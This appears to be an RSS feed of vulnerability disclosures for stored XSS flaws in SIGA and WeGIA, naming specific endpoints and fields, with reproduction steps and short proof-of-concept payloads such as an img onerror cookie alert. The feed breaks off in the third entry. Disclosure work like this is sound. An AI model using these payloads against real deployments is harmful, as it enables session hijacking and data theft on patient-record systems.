<?xml version="1.0" encoding="UTF-8"?><rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:content="http://purl.org/rss/1.0/modules/content/">
  <channel>
    <title>SIGA on CVE-Hunters</title>
    <link>https://www.cvehunters.com/categories/siga/</link>
    <description>Recent content on CVE-Hunters</description>
    <atom:link href="https://www.cvehunters.com/categories/siga/index.xml" rel="self" type="application/rss+xml"/>
      <item>
        <title>CVE-2026-6990</title>
        <link>https://www.cvehunters.com/p/cve-2026-6990/</link>
        <guid>https://www.cvehunters.com/p/cve-2026-6990/</guid>
        <description>&amp;lt;h2 id=&amp;#34;cve-2026-6990-cross-site-scripting-xss-stored-in-new-sigawfappresponsavelnovo-parameter-descrição&amp;#34;&amp;gt;CVE-2026-6990: Cross-Site Scripting (XSS) Stored in new &amp;lt;code&amp;gt;/sigawf/app/responsavel/novo&amp;lt;/code&amp;gt; parameter &amp;lt;code&amp;gt;Descrição&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2026-6990&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2026-6990&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;A Stored Cross-Site Scripting (XSS) vulnerability was identified in the &amp;lt;code&amp;gt;/sigawf/app/responsavel/novo&amp;lt;/code&amp;gt; endpoint of the SIGA application. This vulnerability allows attackers to inject malicious scripts into the &amp;lt;code&amp;gt;Descrição&amp;lt;/code&amp;gt; parameter. The injected scripts are stored on the server and executed automatically whenever the &amp;lt;code&amp;gt;/sigawf/app/responsavel/listar&amp;lt;/code&amp;gt; page is accessed by users, representing a significant security risk.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;details&amp;#34;&amp;gt;Details
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Vulnerable Endpoint: &amp;lt;code&amp;gt;/sigawf/app/responsavel/novo&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2026-6990-cross-site-scripting-xss-stored-in-new-sigawfappresponsavelnovo-parameter-descrição&amp;#34;&amp;gt;CVE-2026-6990: Cross-Site Scripting (XSS) Stored in new &amp;lt;code&amp;gt;/sigawf/app/responsavel/novo&amp;lt;/code&amp;gt; parameter &amp;lt;code&amp;gt;Descrição&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2026-6990&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2026-6990&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;A Stored Cross-Site Scripting (XSS) vulnerability was identified in the &amp;lt;code&amp;gt;/sigawf/app/responsavel/novo&amp;lt;/code&amp;gt; endpoint of the SIGA application. This vulnerability allows attackers to inject malicious scripts into the &amp;lt;code&amp;gt;Descrição&amp;lt;/code&amp;gt; parameter. The injected scripts are stored on the server and executed automatically whenever the &amp;lt;code&amp;gt;/sigawf/app/responsavel/listar&amp;lt;/code&amp;gt; page is accessed by users, representing a significant security risk.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;details&amp;#34;&amp;gt;Details
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Vulnerable Endpoint: &amp;lt;code&amp;gt;/sigawf/app/responsavel/novo&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;Parameter: &amp;lt;code&amp;gt;Descrição&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;poc&amp;#34;&amp;gt;PoC
&amp;lt;/h2&amp;gt;&amp;lt;h3 id=&amp;#34;payload&amp;#34;&amp;gt;Payload
&amp;lt;/h3&amp;gt;&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;1
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-html&amp;#34; data-lang=&amp;#34;html&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;lt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nt&amp;#34;&amp;gt;img&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;na&amp;#34;&amp;gt;src&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;=&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;s&amp;#34;&amp;gt;x&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;na&amp;#34;&amp;gt;onerror&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;=&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;s&amp;#34;&amp;gt;alert(document.cookie)//&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;h3 id=&amp;#34;steps-to-reproduce&amp;#34;&amp;gt;Steps to Reproduce:
&amp;lt;/h3&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt; Register the payload in the &amp;lt;code&amp;gt;Descrição&amp;lt;/code&amp;gt; field at the &amp;lt;code&amp;gt;/sigawf/app/responsavel/novo&amp;lt;/code&amp;gt; endpoint.&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2026-6990/image.png&amp;#34;
	width=&amp;#34;924&amp;#34;
	height=&amp;#34;266&amp;#34;
	srcset=&amp;#34;/p/cve-2026-6990/image_hu_257390f57da3ef36.png 480w, /p/cve-2026-6990/image_hu_e31e27a952009eca.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;347&amp;#34;
		data-flex-basis=&amp;#34;833px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt; After that, the XSS can be triggered by opening the &amp;lt;code&amp;gt;/sigawf/app/responsavel/listar&amp;lt;/code&amp;gt; endpoint.&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2026-6990/image-1.png&amp;#34;
	width=&amp;#34;478&amp;#34;
	height=&amp;#34;164&amp;#34;
	srcset=&amp;#34;/p/cve-2026-6990/image-1_hu_4ede61fcf518e8ab.png 480w, /p/cve-2026-6990/image-1_hu_6277af4afca73498.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;291&amp;#34;
		data-flex-basis=&amp;#34;699px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impact&amp;#34;&amp;gt;Impact
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
  &amp;lt;ul&amp;gt;
    &amp;lt;li&amp;gt;Session hijacking: Stealing cookies or authentication tokens to impersonate users.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Credential theft: Harvesting usernames and passwords using malicious scripts.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Malware delivery: Distributing unwanted or harmful code to victims.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Privilege escalation: Compromising administrative users through persistent scripts.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Data manipulation or defacement: Changing or disrupting site content.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Reputation damage: Eroding trust among site users and administrators.&amp;lt;/li&amp;gt;
  &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;reference&amp;#34;&amp;gt;Reference
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/ViniCastro2001/Security_Reports/tree/main/siga/Stored-XSS-Responsavel&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/ViniCastro2001/Security_Reports/tree/main/siga/Stored-XSS-Responsavel&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;finder&amp;#34;&amp;gt;Finder
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/vinicius-gross-castro&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/viniciusCastro50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/vinicius-gross-castro&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Vinicius Castro&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;By: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/CVE-Hunters/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Sat, 25 Apr 2026 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-2026-40282</title>
        <link>https://www.cvehunters.com/p/cve-2026-40282/</link>
        <guid>https://www.cvehunters.com/p/cve-2026-40282/</guid>
        <description>&amp;lt;h2 id=&amp;#34;cve-2026-40282-cross-site-scripting-xss-stored-in-intercorrencia_visualizarphp&amp;#34;&amp;gt;CVE-2026-40282: Cross-Site Scripting (XSS) Stored in &amp;lt;code&amp;gt;intercorrencia_visualizar.php&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2026-40282&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2026-40282&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;A Stored Cross-Site Scripting (XSS) vulnerability allows an authenticated user to inject malicious JavaScript into the Intercorrências notification page, which is executed when user access the the page, enabling session hijacking and account takeover.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;details&amp;#34;&amp;gt;Details
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;The application does not properly sanitize or encode the user name field, which is displayed in system notifications and accepts user-controlled input. An attacker can inject malicious HTML or JavaScript into this field when creating or modifying a user.&amp;lt;/br&amp;gt;&amp;lt;/br&amp;gt;When an “intercorrência” is registered, a notification is generated. Upon clicking this notification, the application renders the user name in the interface without proper escaping, causing any injected code to be executed in the browser.&amp;lt;/br&amp;gt;&amp;lt;/br&amp;gt;This behavior demonstrates improper output encoding, resulting in a Stored XSS vulnerability.&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2026-40282-cross-site-scripting-xss-stored-in-intercorrencia_visualizarphp&amp;#34;&amp;gt;CVE-2026-40282: Cross-Site Scripting (XSS) Stored in &amp;lt;code&amp;gt;intercorrencia_visualizar.php&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2026-40282&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2026-40282&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;A Stored Cross-Site Scripting (XSS) vulnerability allows an authenticated user to inject malicious JavaScript into the Intercorrências notification page, which is executed when user access the the page, enabling session hijacking and account takeover.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;details&amp;#34;&amp;gt;Details
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;The application does not properly sanitize or encode the user name field, which is displayed in system notifications and accepts user-controlled input. An attacker can inject malicious HTML or JavaScript into this field when creating or modifying a user.&amp;lt;/br&amp;gt;&amp;lt;/br&amp;gt;When an “intercorrência” is registered, a notification is generated. Upon clicking this notification, the application renders the user name in the interface without proper escaping, causing any injected code to be executed in the browser.&amp;lt;/br&amp;gt;&amp;lt;/br&amp;gt;This behavior demonstrates improper output encoding, resulting in a Stored XSS vulnerability.&amp;lt;/p&amp;gt;
&amp;lt;ul&amp;gt;
&amp;lt;li&amp;gt;Vulnerable Endpoint: &amp;lt;code&amp;gt;intercorrencia_visualizar.php&amp;lt;/code&amp;gt;&amp;lt;/li&amp;gt;
&amp;lt;/ul&amp;gt;
&amp;lt;h2 id=&amp;#34;poc&amp;#34;&amp;gt;PoC
&amp;lt;/h2&amp;gt;&amp;lt;h3 id=&amp;#34;payload&amp;#34;&amp;gt;Payload
&amp;lt;/h3&amp;gt;&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;1
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-html&amp;#34; data-lang=&amp;#34;html&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;lt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nt&amp;#34;&amp;gt;img&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;na&amp;#34;&amp;gt;src&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;=&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;s&amp;#34;&amp;gt;1&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;na&amp;#34;&amp;gt;onerror&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;=&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;s&amp;#34;&amp;gt;alert(&amp;amp;#34;XSS&amp;amp;#34;)&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;gt;&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;h3 id=&amp;#34;steps-to-reproduce&amp;#34;&amp;gt;Steps to Reproduce:
&amp;lt;/h3&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;&amp;lt;b&amp;gt;1.&amp;lt;/b&amp;gt; Register a patient where the “Name” or &amp;#34;Sobrenome&amp;#34; field contains the payload.&amp;lt;/br&amp;gt;&amp;lt;/br&amp;gt;&amp;lt;b&amp;gt;2.&amp;lt;/b&amp;gt; Add a &amp;#34;Intercorrência&amp;#34; entry for this user.&amp;lt;/br&amp;gt;&amp;lt;/br&amp;gt;&amp;lt;b&amp;gt;3.&amp;lt;/b&amp;gt; Navigate to the &amp;#34;Intercorrências&amp;#34; notification page and click in &amp;#34;Recentes&amp;#34; and &amp;#34;Histórico. This vulnerability affects the both pages.&amp;lt;/br&amp;gt;&amp;lt;/br&amp;gt;&amp;lt;b&amp;gt;4.&amp;lt;/b&amp;gt; Observe that the payload is executed in the browser:&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2026-40282/image.png&amp;#34;
	width=&amp;#34;603&amp;#34;
	height=&amp;#34;330&amp;#34;
	srcset=&amp;#34;/p/cve-2026-40282/image_hu_dfc5bc911aa9fe3a.png 480w, /p/cve-2026-40282/image_hu_581b1a4709b48d43.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;182&amp;#34;
		data-flex-basis=&amp;#34;438px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impact&amp;#34;&amp;gt;Impact
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
  &amp;lt;ul&amp;gt;
    &amp;lt;li&amp;gt;Session hijacking: Stealing cookies or authentication tokens to impersonate users.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Credential theft: Harvesting usernames and passwords using malicious scripts.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Malware delivery: Distributing unwanted or harmful code to victims.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Privilege escalation: Compromising administrative users through persistent scripts.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Data manipulation or defacement: Changing or disrupting site content.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Reputation damage: Eroding trust among site users and administrators.&amp;lt;/li&amp;gt;
  &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;reference&amp;#34;&amp;gt;Reference
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-r6h8-7vxv-q8pp&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-r6h8-7vxv-q8pp&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;finder&amp;#34;&amp;gt;Finder
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://br.linkedin.com/in/thiagoescarrone&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/thiago50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://br.linkedin.com/in/thiagoescarrone&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Thiago Escarrone&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;By: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/CVE-Hunters/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Fri, 17 Apr 2026 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-2026-40283</title>
        <link>https://www.cvehunters.com/p/cve-2026-40283/</link>
        <guid>https://www.cvehunters.com/p/cve-2026-40283/</guid>
        <description>&amp;lt;h2 id=&amp;#34;cve-2026-40283-cross-site-scripting-xss-stored-in-profile_pacientephp&amp;#34;&amp;gt;CVE-2026-40283: Cross-Site Scripting (XSS) Stored in &amp;lt;code&amp;gt;profile_paciente.php&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2026-40283&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2026-40283&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;A Stored Cross-Site Scripting (XSS) vulnerability allows an authenticated user to inject malicious JavaScript via the “Nome” field in the “Informações Pacientes” page. The payload is stored and executed when the patient information is viewed.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;details&amp;#34;&amp;gt;Details
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;The application does not properly sanitize or encode the “Nome” field, which accepts user-controlled input. An attacker can insert malicious HTML or JavaScript into this field when creating or editing a patient.&amp;lt;/br&amp;gt;&amp;lt;/br&amp;gt;When the “Informações Pacientes” page is accessed, this value is rendered in the DOM without proper escaping, leading to execution of the injected code in the browser.&amp;lt;/br&amp;gt;&amp;lt;/br&amp;gt;This behavior indicates improper output encoding and results in a Stored XSS vulnerability.&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2026-40283-cross-site-scripting-xss-stored-in-profile_pacientephp&amp;#34;&amp;gt;CVE-2026-40283: Cross-Site Scripting (XSS) Stored in &amp;lt;code&amp;gt;profile_paciente.php&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2026-40283&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2026-40283&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;A Stored Cross-Site Scripting (XSS) vulnerability allows an authenticated user to inject malicious JavaScript via the “Nome” field in the “Informações Pacientes” page. The payload is stored and executed when the patient information is viewed.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;details&amp;#34;&amp;gt;Details
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;The application does not properly sanitize or encode the “Nome” field, which accepts user-controlled input. An attacker can insert malicious HTML or JavaScript into this field when creating or editing a patient.&amp;lt;/br&amp;gt;&amp;lt;/br&amp;gt;When the “Informações Pacientes” page is accessed, this value is rendered in the DOM without proper escaping, leading to execution of the injected code in the browser.&amp;lt;/br&amp;gt;&amp;lt;/br&amp;gt;This behavior indicates improper output encoding and results in a Stored XSS vulnerability.&amp;lt;/p&amp;gt;
&amp;lt;ul&amp;gt;
&amp;lt;li&amp;gt;Vulnerable Endpoint: &amp;lt;code&amp;gt;profile_paciente.php&amp;lt;/code&amp;gt;&amp;lt;/li&amp;gt;
&amp;lt;/ul&amp;gt;
&amp;lt;h2 id=&amp;#34;poc&amp;#34;&amp;gt;PoC
&amp;lt;/h2&amp;gt;&amp;lt;h3 id=&amp;#34;payload&amp;#34;&amp;gt;Payload
&amp;lt;/h3&amp;gt;&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;1
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
